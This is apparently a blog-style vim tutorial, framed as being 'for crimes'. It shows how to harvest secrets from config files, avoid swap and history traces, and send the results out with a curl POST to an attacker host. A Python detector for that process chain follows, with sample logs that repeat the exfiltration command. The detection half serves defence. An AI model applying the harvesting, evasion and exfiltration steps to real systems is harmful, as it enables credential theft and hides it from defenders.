aka, how to use your editor for crimes! i don’t expect to ever do any crimes but i do like picking up new vim tricks…
ex commands are what you use for operations like writing, quitting,
find-and-replace, manipulating buffers and running external shell commands.
they start with a colon: :w, :%s/old/new/ and so on, or
:r !<external command> to read a command's output into the buffer.
if you’re doing a crime, start vim like vim -n -i NONE:
-n means no swap file and -i NONE means no viminfo file, so command-line
history, search patterns and marks aren’t written to disk and no recovery
file is left lying around. hides your traces! (some of them, anyway: the shell
you launched vim from still records that in its own history.)
:args is an ex command which loads all files matching
a glob: :args **/*.{env,json,yaml,php,py}. the **/
is recursive globbing, and the stuff in braces is brace expansion, one
entry per extension. nifty! this puts the files in the argument list (each
one gets a buffer, and the first one is opened).
:vimgrep lets you grep a regex against some files and
puts the results (the matching lines) in the quickfix list.
:vimgrep <pattern> ## tells it to search the whole
argument list (## expands to every file in it; wrap the pattern
in slashes, /<pattern>/, if it contains spaces or you want the j flag).
:copen opens the quickfix window. always nifty, always
easy to forget! :cnext and :cprev move
through the matches.
the quickfix window is read-only, so to get its contents into an editable
buffer we can chain ex commands with |: :%y a|q|new|0put a|$d which… let’s see. yanks
the whole buffer into register a, then closes the quickfix window, then
new creates a new empty buffer, 0put a puts
the contents of register a above line 1 (i.e. at the top), and $d deletes the
empty line left at the end.
doing all this inside one vim process, instead of a string of grep | cut | sort commands in the shell, leaves fewer separate entries in shell history and process logs for people to notice!
use a :s substitution to trim each line down to just the secret, if you like.
:sort u sorts lines and the u drops duplicates, all inside vim,
which is different to :%!sort -u: that filters the buffer through the external
sort command, i.e. a child process (plus a temp file) that process accounting,
auditd or an EDR can log.
to exfiltrate you can write to a file to retrieve later, or you can
use curl to put your secrets in the body of a POST to a listening http
port. base64 encode it first with :%!base64 if you want it to look less
obviously like secrets in transit (it’s encoding, not encryption, so anyone
who captures it can decode it).
:%w !curl -X POST --data-binary @- http://attacker-IP:8000/exfil -s
writes the whole buffer to the standard input of an external command; @- tells curl
to read the body from stdin and -s suppresses the progress output.
not as quiet as it looks, though: vim runs that through sh -c, so anything
watching execve (auditd, an EDR) sees vim spawn a shell that spawns curl with the
full URL on its command line, and the connection to attacker-IP shows up in
network logs like any other outbound POST.
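the vim -> sh -> curl chain above isn’t invisible, so here’s what the other side looks like. this is an added example, not from the original post: a small python detector run over constructed process-exec events (json lines with pid, ppid, comm and cmdline; the tool names, pids, temp paths and the 203.0.113.7 address are all made up for the example). it flags an editor started with -n or -i NONE, and any encoding/network tool whose process ancestry includes an editor, pulling out the URL for triage.

```python
# added example (not from the original post): detection logic for the
# vim -> sh -> curl chain, run over constructed exec events.
import json
import re

# these name sets are assumptions for the example; tune to your host inventory
EDITORS = {"vim", "vi", "nvim", "view", "vimdiff", "ex"}
EXFIL_TOOLS = {"curl", "wget", "nc", "ncat", "socat", "scp", "ssh", "base64", "openssl"}
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
NO_SWAP_RE = re.compile(r"(?:^|\s)-n(?:\s|$)")            # vim -n: no swap file
NO_VIMINFO_RE = re.compile(r"(?:^|\s)-i\s+NONE(?:\s|$)")  # vim -i NONE: no viminfo

# constructed exec events (json lines: pid, ppid, comm, cmdline), shaped like a
# normalised auditd EXECVE+SYSCALL pair or an eBPF exec tracer's output.
# vim runs :%!base64 as `(base64) < tmpin > tmpout` and :%w !cmd as
# `(cmd) < tmpfile`, both via sh -c, so those wrappers show up in the tree.
SAMPLE_LOG = """\
{"pid": 4010, "ppid": 3990, "comm": "bash", "cmdline": "bash"}
{"pid": 4021, "ppid": 4010, "comm": "vim", "cmdline": "vim -n -i NONE"}
{"pid": 4022, "ppid": 4021, "comm": "sh", "cmdline": "sh -c (base64) < /tmp/vrz1bk/1 > /tmp/vrz1bk/2"}
{"pid": 4023, "ppid": 4022, "comm": "base64", "cmdline": "base64"}
{"pid": 4024, "ppid": 4021, "comm": "sh", "cmdline": "sh -c (curl -X POST --data-binary @- http://203.0.113.7:8000/exfil -s) < /tmp/vrz1bk/3"}
{"pid": 4025, "ppid": 4024, "comm": "curl", "cmdline": "curl -X POST --data-binary @- http://203.0.113.7:8000/exfil -s"}
{"pid": 4030, "ppid": 4010, "comm": "vim", "cmdline": "vim notes.md"}
{"pid": 4031, "ppid": 4030, "comm": "sh", "cmdline": "sh -c (sort -u) < /tmp/vab3xq/1 > /tmp/vab3xq/2"}
{"pid": 4032, "ppid": 4031, "comm": "sort", "cmdline": "sort -u"}
{"pid": 4040, "ppid": 4010, "comm": "curl", "cmdline": "curl -s https://example.org/"}
"""


def parse_events(text):
    """One json object per line -> list of dicts (constructed format)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ancestor_comms(event, by_pid, max_depth=16):
    """Walk ppid links and return the comm names of the parents, nearest first."""
    chain = []
    cur = by_pid.get(event["ppid"])
    while cur is not None and len(chain) < max_depth:
        chain.append(cur["comm"])
        cur = by_pid.get(cur["ppid"])
    return chain


def detect(events):
    """Return findings for anti-forensic editor flags and editor-spawned exfil tools."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        comm, cmd = e["comm"], e["cmdline"]
        # rule 1: an editor started so that it leaves no swap/viminfo on disk
        if comm in EDITORS and (NO_SWAP_RE.search(cmd) or NO_VIMINFO_RE.search(cmd)):
            findings.append({"kind": "editor_antiforensic_flags", "pid": e["pid"],
                             "cmdline": cmd})
        # rule 2: an encoder or network tool anywhere under an editor. the `sh -c`
        # wrapper vim inserts is skipped by matching on the tool's own comm and
        # looking at the whole ancestor chain rather than just the direct parent.
        if comm in EXFIL_TOOLS:
            parents = ancestor_comms(e, by_pid)
            if any(p in EDITORS for p in parents):
                m = URL_RE.search(cmd)
                findings.append({"kind": "editor_spawned_exfil_tool", "pid": e["pid"],
                                 "tool": comm, "parents": parents,
                                 "url": m.group(0) if m else None})
    return findings


if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_LOG)):
        print(f)
```

the benign vim session (vim notes.md filtering through sort -u) and the curl run straight from bash are deliberately in the sample and are not flagged; only the editor-rooted base64 and curl, and the vim -n -i NONE start, come out. in a real pipeline you would join on the session/user as well, since vim spawning curl is unusual but not impossible for a legitimate plugin.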
wow, vim is so nifty!! B)